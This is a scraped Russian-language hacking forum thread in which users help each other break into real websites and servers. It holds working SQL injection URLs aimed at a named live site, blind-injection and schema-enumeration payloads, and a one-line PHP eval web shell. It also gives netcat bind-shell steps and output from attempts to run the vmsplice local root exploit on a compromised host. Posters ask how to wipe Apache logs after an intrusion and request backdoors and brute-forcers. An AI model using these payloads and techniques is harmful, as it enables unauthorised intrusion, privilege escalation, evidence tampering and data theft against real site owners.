.php?mod=1/**/union/**/select/**/1/*
А вот так?
.php?mod=1/**/union/**/select/**/1--+
А вот так?
.php?mod=-1/**/union/**/select/**/1--+
А вот так?
.php?mod=-1/**/and/**/1=1--+
А вот так?
.php?mod=-1/**/and/**/1=2--+

Продолжаем гадание, или почитаешь что-то? А может мы увидем линк?

^
^
^
^

еслиб register_globals=On оно бы передалось в любом случае..а значит никак.
А разве я не могу взять другую html`ку на саете, переправить под форму создания юзера и вызову функцию?

как себя обезопасить после проведения Sql inj.
известно:
система: Apache/2.2.6 (FreeBSD) mod_ssl/2.2.6 OpenSSL/0.9.8e DAV/2 PHP/5.2.9 with Suhosin-Patch
version(): 5.1.22-rc-log
есть login и хеш пароль roota к БД бручу... пока безуспешно.
там висит JOOMLA пасс тоже пока в бруте.
как залить шелл после того как я узнаю пасс?
логи чистить эти?
/var/log/httpd-error.log
/var/log/httpd-access.log
какие дальше действия?

Скуль от какого юзера бд? МОжет через неё легче прочитать пасс root'а где-нить в конфигах чем брутить.

p.r0phe.t

4 ветка, фильтрация пробелов, "+", "=".
file_priv=n

Если очень-очень нужно, то можно:
http://apsite.ru/x/popup.php?mod=1'/**/or/**/if(substring(version(),1,1)/**/like/**/4,1,(select/**/1/**/union/**/select/**/2))/*

подбираем таблицу:
http://apsite.ru/x/popup.php?mod=1'/**/or/**/if((select/**/1/**/from/**/admin),1,(select/**/1/**/union/**/select/**/2))/*

и дальше в этом-же ключе :
http://forum.antichat.ru/threadnav35207-1-10.html

Отличный способ от скуки :)

root@localhost
пример запроса кинь

есть шелл на сервере ISS 6.0, на нем висит N пользователей и N сайтов этих пользователей,и у шелла права пользователя,можно ли как то вылезти из юзера?
смд разумеется не работает.

Значит так:
1. Есть шелл на сервере.
2. Есть NetCat у меня.
По всей видимости на сервере стоит антивирь, т.к. при бек-коннекте с помощью встроенной ф-ции в r57 ничего не происходит. Брал так же другой скрипт для бек-коннект - ничего... Как сделать бек-коннект?


https://forum.antichat.ru/showthread.php?t=145301

подскажите...
с помощью скули вида
www.site.com/home.php?fid=8+and+1=2+union+select+1=user(),2,3+--+
выдернул все названия бд,таблиц и столбцов. Теперь хочу узнать столбцы из таблицы users. Узнал тока столбец id.
1) возможно ли узнать как то остальные названия кроме брута (брутить почему-то не получается)
2) кавычки совать нельзя. можно ли в where хешить само условие?

union select column_name from information_schema.columns where table_name=0x7573657273 limit 0,1
где 7573657273 users..а вообще читай статьи..это так трудно?

union select column_name from information_schema.columns where table_name=0x7573657273 limit 0,1
где 7573657273 users..а вообще читай статьи..это так трудно?
или через group_concat() без лимита, правда иногда может невсе вывести если сильно много данных.

Есть похапе-шелл и возможность компилить локальным юзером на FreeBSD 6.3-RELEASE-p11. На машине еще около двухста юзеров, MySql (5.0.75) и Апач.
Как поднять права до рута? Как можно посмотреть содержимое директорий соседа?

p.r0phe.t

4 ветка, фильтрация пробелов, "+", "=".
file_priv=n

Если очень-очень нужно, то можно:
http://apsite.ru/x/popup.php?mod=1'/**/or/**/if(substring(version(),1,1)/**/like/**/4,1,(select/**/1/**/union/**/select/**/2))/*

подбираем таблицу:
http://apsite.ru/x/popup.php?mod=1'/**/or/**/if((select/**/1/**/from/**/admin),1,(select/**/1/**/union/**/select/**/2))/*

и дальше в этом-же ключе :
http://forum.antichat.ru/threadnav35207-1-10.html

Отличный способ от скуки :)

а не проще так?
http://apsite.ru/x/popup.php?mod=1'/**/union/**/select/**/1/**/from/**/admin/* результат тот же..
Но,если таблица будет правильная,всё равно будет пустой экран.
Поправь если что.

http://apsite.ru/x/popup.php?mod=1'/**/or/**/if(substring(version(),1,1)/**/like/**/4,1,(select/**/1/**/union/**/select/**/2))/*
А какой смысл этого запроса,если все равно экран пустой?

Знаю что не по теме но все таки... Посоветуйте какой нибуть бек дор (системный продукт) для удаленного упр. сервера (предположительно стоит windows 2003/2008)
Главный функционал -> командная строка (телнет чтоли называется) либо отстук куда нибуть (т.е. чтобы зараж. машина брала cmd команды с хоста моего)

Знаю что много щас сущ. продуктов/бек доров но нужен стабильный продукт/бек дор (можно и палевный бек дор)

а не проще так?
http://apsite.ru/x/popup.php?mod=1'/**/union/**/select/**/1/**/from/**/admin/* результат тот же..
Но,если таблица будет правильная,всё равно будет пустой экран.
Поправь если что.
Ты перебор как будешь организовывать? Или значения полей тоже по словарю? Тогда и такой способ пойдёт

Статью прочти, которую я дал в том посте

Ты перебор как будешь организовывать? Или значения полей тоже по словарю? Тогда и такой способ пойдёт

Статью прочти, которую я дал в том посте

Ок,спасибо,буду разбираться.

http://apsite.ru/x/popup.php?mod=1'/**/or/**/if(substring(version(),1,1)/**/like/**/4,1,(select/**/1/**/union/**/select/**/2))/*
А какой смысл этого запроса,если все равно экран пустой?
Ответь плз.

А какой он должен быть, если скрипт вообще ничего не выводит?

Это blind. Пустой экран - TRUE , more than 1 row - FALSE

Статью прочти, которую я дал в том посте

Посоветуйте шелл который можно через pma залить,весом до 5кб и работающий magic_quotes_gpc On

<?php eval(stripslashes($_REQUEST[ev])); ?>

есть скуль инъекция, смогу ли я через нее выполнить запрос update ? и подскажите пример каким образом..

есть скуль инъекция, смогу ли я через нее выполнить запрос update ? и подскажите пример каким образом..


в mysql - нет, если конечно скуля не в запросе "update".

а в mssql теоретически можно так script.php?id=4;update.....

есть скуль инъекция, смогу ли я через нее выполнить запрос update ? и подскажите пример каким образом..
MSSQL, PostgreSql, Oracle - любой ql-запрос, отделив его ";" от основного

понял спасибо, еще такая проблемка, нашел пхп инъекцию, в lang= открываются пхп файлы, ибо там автоматом уже прописывается .php т.е ошибка выходит типа: Warning: main(lang/../../.php) , как мне обойти разрешение это? и посмотреть passwd и еще чтото. ставлю в конец %00 итог: Warning: main(lang/../../\0.php):

понял спасибо, еще такая проблемка, нашел пхп инъекцию, в lang= открываются пхп файлы, ибо там автоматом уже прописывается .php т.е ошибка выходит типа: Warning: main(lang/../../.php) , как мне обойти разрешение это? и посмотреть passwd и еще чтото. ставлю в конец %00 итог: Warning: main(lang/../../\0.php):
https://forum.antichat.ru/thread98525.html
Если того что тема прикреплена уже мало, мб начать красить названия тем в цвета радуги и что бы их названия как баннеры на половину браузера вылезали?

-----------------------------------------------------------
"SELECT DISTINCT xxx FROM xxx, xxx WHERE xxx=xxx AND (xxx LIKE '%{INJ}%' OR xxx LIKE '%{INJ}%' OR xxx LIKE '%{INJ}%' OR xxx LIKE '%{INJ}%' ) ORDER BY xxx";
-----------------------------------------------------------
помогите составить inj запрос )

?поле1=%'+and+поле2=-false+union+select+количество полей/*

L I G A
скобку забыл

') union select lalala /*

Скажите в чём причина,никак не компилируются Файлы не серве с вебшелом c99madshell!?
Gcc есть
uname -a:
Software: Apache/2.2.3 (Debian) DAV/2 SVN/1.4.2 PHP/5.2.6-3 with Suhosin-Patch

uname -a: Linux yesclub 2.6.18-6-686 #1 SMP Sun Feb 10 22:11:31 UTC 2008 i686

uid=33(www-data) gid=33(www-data) groups=33(www-data)

Safe-mode: OFF (not secure)
И подскажите рабочий эксплойт под это систему.
И ещё при конекте через Puty на бинд порт все строки сдвигаются,комынды не выполняются,всегда пишет comand not found,что бы не писал.

Возможно, этот прокатит - vmsplice Local Root Exploit

Возможно, этот прокатит - vmsplice Local Root Exploit

Его то я и пытаюсь собрать
gcc -o expl expl.c
ничего не выводит,вообще ничего не компилит... =(

2p.r0phe.t
Залей шелл WSO.
Там есть ф-я бинд порт.
У себя поставь NetCat, и вбей команду(у себя) nc -l -p 31336
В шелле вбивай свой ip и жми bind (выбирай перловый бинд).
Смотри в свойю cmd, увидишь консоль сервака.
И там уже компели.

p.r0phe.t
а ты де нить попробуй собрать експлоит а потом загрузить

Подскажите брутер для дедиков, рабочий.

Подскажите брутер для дедиков, рабочий.
RPD Brute - качай (http://slil.ru/28143093)

2p.r0phe.t
Залей шелл WSO.
Там есть ф-я бинд порт.
У себя поставь NetCat, и вбей команду(у себя) nc -l -p 31336
В шелле вбивай свой ip и жми bind (выбирай перловый бинд).
Смотри в свойю cmd, увидишь консоль сервака.
И там уже компели.
Спс,гляну.

p.r0phe.t
а ты де нить попробуй собрать експлоит а потом загрузить
Нету дебиана под рукой,ставить ломы =)
А чё по вебу нельзя gcc юзать?

Забиндил порт на сервере,приконектился через пути,всё ровно,НО:
Вывод результата раскидан по всей консоли. С чем это связано?

При нажатие на старт брут - появляется на 1 секунду CMD и сразу пропадает, при повторном нажатие ничего не стается.
Или надо батники делать?

подключись с помощью netcat

']подключись с помощью netcat
Хех,точно. Пасиб =)

sh-3.1$ gcc 2.6.18.c -o expl 2.6.18.c:20:19: error: stdio.h: No such file or directory 2.6.18.c:21:19: error: errno.h: No such file or directory 2.6.18.c:22:20: error: stdlib.h: No such file or directory 2.6.18.c:23:20: error: string.h: No such file or directory 2.6.18.c:24:20: error: malloc.h: No such file or directory In file included from /usr/lib/gcc/i486-linux-gnu/4.1.2/include/syslimits.h:7, from /usr/lib/gcc/i486-linux-gnu/4.1.2/include/limits.h:11, from 2.6.18.c:25: /usr/lib/gcc/i486-linux-gnu/4.1.2/include/limits.h:122:61: error: limits.h: No s uch file or directory 2.6.18.c:26:20: error: signal.h: No such file or directory 2.6.18.c:27:20: error: unistd.h: No such file or directory 2.6.18.c:28:21: error: sys/uio.h: No such file or directory 2.6.18.c:29:22: error: sys/mman.h: No such file or directory 2.6.18.c: In function 'die': 2.6.18.c:55: warning: incompatible implicit declaration of built-in function 'pr intf' 2.6.18.c:56: error: 'stdout' undeclared (first use in this function) 2.6.18.c:56: error: (Each undeclared identifier is reported only once 2.6.18.c:56: error: for each function it appears in.) 2.6.18.c:57: error: 'stderr' undeclared (first use in this function) 2.6.18.c:58: warning: incompatible implicit declaration of built-in function 'ex it' 2.6.18.c: At top level: 2.6.18.c:143: warning: 'struct iovec' declared inside parameter list 2.6.18.c:143: warning: its scope is only this definition or declaration, which i s probably not what you want 2.6.18.c: In function '_vmsplice': 2.6.18.c:143: error: 'errno' undeclared (first use in this function) 2.6.18.c: In function 'exit_code': 2.6.18.c:183: warning: incompatible implicit declaration of built-in function 'p rintf' 2.6.18.c:185: warning: incompatible implicit declaration of built-in function 'e xecl' 2.6.18.c:185: error: 'NULL' undeclared (first use in this function) 2.6.18.c:186: error: 'errno' undeclared (first use in this function) 2.6.18.c: In function 'main': 2.6.18.c:192: error: 'size_t' undeclared (first use in this function) 2.6.18.c:192: error: expected ';' before 'map_size' 2.6.18.c:194: error: storage size of 'iov' isn't known 2.6.18.c:202: warning: incompatible implicit declaration of built-in function 'p rintf' 2.6.18.c:214: error: 'map_size' undeclared (first use in this function) 2.6.18.c:215: error: 'PROT_READ' undeclared (first use in this function) 2.6.18.c:215: error: 'PROT_WRITE' undeclared (first use in this function) 2.6.18.c:216: error: 'MAP_FIXED' undeclared (first use in this function) 2.6.18.c:216: error: 'MAP_PRIVATE' undeclared (first use in this function) 2.6.18.c:216: error: 'MAP_ANONYMOUS' undeclared (first use in this function) 2.6.18.c:216: warning: assignment makes pointer from integer without a cast 2.6.18.c:217: error: 'MAP_FAILED' undeclared (first use in this function) 2.6.18.c:218: error: 'errno' undeclared (first use in this function) 2.6.18.c:220: warning: incompatible implicit declaration of built-in function 'm emset' 2.6.18.c:236: warning: assignment makes pointer from integer without a cast 2.6.18.c:254: warning: assignment makes pointer from integer without a cast 2.6.18.c:263: error: 'NULL' undeclared (first use in this function) 2.6.18.c:264: warning: assignment makes pointer from integer without a cast 2.6.18.c:283: error: 'SIGPIPE' undeclared (first use in this function) 2.6.18.c:287:2: warning: no newline at end of file sh-3.1$

В чем проблема?

Нету библиотек.
Как вариант, найди их, положи в папку со сплойтом.
Затем в смлойте измени:
#include <liba.h>
на
#include "liba.h"

Нету библиотек.
Как вариант, найди их, положи в папку со сплойтом.
Затем в смлойте измени:
#include <liba>
на
#include "liba"
ВАрниант,но там помомо библиотек хватает ероров... не пояснишь их?

Парни сканером нашел уязвимость:
php html entity encoder heap overflow vulnerability, но нигде не могу найти инфу как ее юзать, кроме этого: http://www.securitylab.ru/vulnerability/276352.php. Но этого не достаточно, может кто нибудь помочь, поконкретней описать багу?

ВАрниант,но там помомо библиотек хватает ероров... не пояснишь их?

Половина эрроров из за отсутствия библиотек.
Видимо используються ф-я объявленная в той или иной библиотеке.

p.r0phe.t, что показывают команды

$ find / -name stdio.h

и/или

$ locate stdio.h

Возможно, они есть, но лежат по нестандартному пути. Если же не найдутся, придется компилить на другой тачке. А тянуть все хэдеры - это гемор

p.r0phe.t, что показывают команды

$ find / -name stdio.h

и/или

$ locate stdio.h

Возможно, они есть, но лежат по нестандартному пути. Если же не найдутся, придется компилить на другой тачке. А тянуть все хэдеры - это гемор

sh-3.1$ locate stdio.h
/usr/lib/gcc/i486-linux-gnu/4.1.2/include/ssp/stdio.h
/usr/lib/perl/5.8.8/CORE/nostdio.h

Компилирую на своём OpenSUSe не нашёл всего 1 библиотеку: asm/page.h. Вопрос: где скачать эту либу и куда ему закопировать?


P.S. Всё,разобрался. либу с поломанного серва слил,кому мож понадобится,либы хранятся в usr/include/

est takoy vapros..(izvinite 4to po ruskom ne napisu)

naprimer na sayte est injection (mysql ili sql) i ya nasel table name

http://www.xxx.com/news.php?iid=1+union+select+0,1,2,3,4+from+admin

a potom ya xo4u nayti columns name nu tut ne daet kakom 4isle columns name naprimer 2,3 a kak mojno ix uznat??

order+by ili kak??

est takoy vapros..(izvinite 4to po ruskom ne napisu)

naprimer na sayte est injection (mysql ili sql) i ya nasel table name

http://www.xxx.com/news.php?iid=1+union+select+0,1,2,3,4+from+admin

a potom ya xo4u nayti columns name nu tut ne daet kakom 4isle columns name naprimer 2,3 a kak mojno ix uznat??

order+by ili kak??

RTFM!
Статей по скулям - тьма!

ne ponel

LokbatanLi
http://www.xxx.com/news.php?iid=1+union+select+table_name,1,2,3,4+fro m+information_schema.tables+limit+17,1
только в случае если весия ДБ 5, и если у тебя вывод под цифрой 0
дальше после того как узнал имя нужной табелки
http://www.xxx.com/news.php?iid=1+union+select+column_name,1,2,3,4+fr om+information_schema.columns+where+table_name='ad min'+limit+0,1
имя табелки лучше перевести в SQL HEX
а еще лучше я думаю вот такой вот запрос сделать

http://www.xxx.com/news.php?iid=1+UNION+SELECT+AES_DECRYPT(AES_ENCRYP T(CONCAT(0xd187d0b8d182d0b0d0b920d181d182d0b0d182d 0b5d0b9d0bad0b820d0bfd180d0be20d181d0bad183d0bbd0b 8,(SELECT+CONCAT(TABLE_NAME,0x3a,TABLE_SCHEMA)+FRO M+INFORMATION_SCHEMA.TABLES+LIMIT+16,1),0x 0xd182d0b8d0bfd0be20687474703a2f2f666f72756d2e616e 7469636861742e72752f7468726561643130343539312e6874 6d6c),0x71),0x71)

p.r0phe.t, что показывают команды

$ find / -name stdio.h

и/или

$ locate stdio.h

Возможно, они есть, но лежат по нестандартному пути. Если же не найдутся, придется компилить на другой тачке. А тянуть все хэдеры - это гемор

Все либы есть на хосте. Какой синтаксис для прописывания путей к ним? В си не шарю =(

p.r0phe.t
да кинь ты уже кому нить линк в пм!

p.r0phe.t
да кинь ты уже кому нить линк в пм!

К шелу линк? хм.
Мне для себя интересно поковыряться.
В общем разобрался,сплойт не проканал =(
sh-3.1$ ./expl
-----------------------------------
Linux vmsplice Local Root Exploit
By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7e22000 .. 0xb7e54000
[-] vmsplice: Bad address

Снова есть вопрос
Как прикрыть забинденные мной порты? =)
И какой ещё сплойт под эту систему посоветуете
Linux yesclub 2.6.18-6-686

LokbatanLi
http://www.xxx.com/news.php?iid=1+union+select+table_name,1,2,3,4+fro m+information_schema.tables+limit+17,1
только в случае если весия ДБ 5, и если у тебя вывод под цифрой 0
дальше после того как узнал имя нужной табелки
http://www.xxx.com/news.php?iid=1+union+select+column_name,1,2,3,4+fr om+information_schema.columns+where+table_name='ad min'+limit+0,1
имя табелки лучше перевести в SQL HEX
а еще лучше я думаю вот такой вот запрос сделать

http://www.xxx.com/news.php?iid=1+UNION+SELECT+AES_DECRYPT(AES_ENCRYP T(CONCAT(0xd187d0b8d182d0b0d0b920d181d182d0b0d182d 0b5d0b9d0bad0b820d0bfd180d0be20d181d0bad183d0bbd0b 8,(SELECT+CONCAT(TABLE_NAME,0x3a,TABLE_SCHEMA)+FRO M+INFORMATION_SCHEMA.TABLES+LIMIT+16,1),0x 0xd182d0b8d0bfd0be20687474703a2f2f666f72756d2e616e 7469636861742e72752f7468726561643130343539312e6874 6d6c),0x71),0x71)

vi ne poneli menya

vi ne poneli menya

Для начала, воспользуйся сервисом http://www.translit.ru , дабы тебя можно было лучше понять. После этого или перефразируй свой вопрос, или же прочти вот эту статью (http://forum.antichat.ru/thread43966.html) . Мне кажется, после прочтения (возможно, первого) многие вопросы отпадут сами собой. Удачи! =)

LokbatanLi
Прочитай то что тебе люди рекомендуют, если бы перевел захексенное в текст в последнем моем запросе для тебя, то о чудо там бы и ссыль на как ракрутить скулю была и еще многие ответы на твои вопросы, а если тебе не подобрать число столбцов в скуле то или ищи в другом месте скулю с выводом , или крути cкулю как слепую (блайнд)
http://www.xxx.com/news.php?iid=1+AND+SUBSTRING((version())=x
где х меняешь в соответствие с запросом...
или
http://www.xxx.com/news.php?iid=1+AND+ASCII(SUBSTRING((version() ),1,1))>char твоего запроса
www.translit.ru обеспечит нормальное отношение к тебе и позволит сформулировать вопрос на который можно будет ответить ...